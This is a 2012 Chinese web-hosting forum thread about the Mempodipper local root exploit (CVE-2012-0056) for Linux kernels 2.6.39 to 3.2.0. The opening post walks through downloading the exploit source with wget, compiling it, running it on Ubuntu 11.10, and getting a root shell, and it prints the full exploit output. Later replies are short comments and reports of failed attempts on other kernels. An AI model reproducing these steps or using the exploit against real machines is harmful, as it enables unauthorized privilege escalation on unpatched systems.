全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 1069|回复: 12
打印 上一主题 下一主题

[疑问] Linux 2.6.39 到 3.2.0 爆提权漏洞

[复制链接]
跳转到指定楼层
2#
 楼主| 发表于 2012-3-8 18:41:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.下载漏洞利用文件


wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行
netcat@netcat:~$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8049564.
[+] Executing su with shellcode.
sh-4.2#

效果自测!
13#
发表于 2012-3-8 21:24:49 | 只看该作者
漂过。。。
12#
发表于 2012-3-8 20:37:22 | 只看该作者
路过
11#
发表于 2012-3-8 20:35:58 | 只看该作者
等咩咩在centos上测试
10#
发表于 2012-3-8 20:31:23 | 只看该作者
玩不懂。
9#
发表于 2012-3-8 20:27:31 | 只看该作者
omg
suzizi 该用户已被删除
8#
发表于 2012-3-8 20:24:10 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
7#
发表于 2012-3-8 20:22:04 | 只看该作者
arch
3.2.8 失败……是必然的
6#
发表于 2012-3-8 19:07:46 | 只看该作者
debian testing
kernel 3.1.0失败
5#
发表于 2012-3-8 18:43:38 | 只看该作者
什么玩意,用一件包的人表示看不懂
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-1-15 04:27 , Processed in 0.077571 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表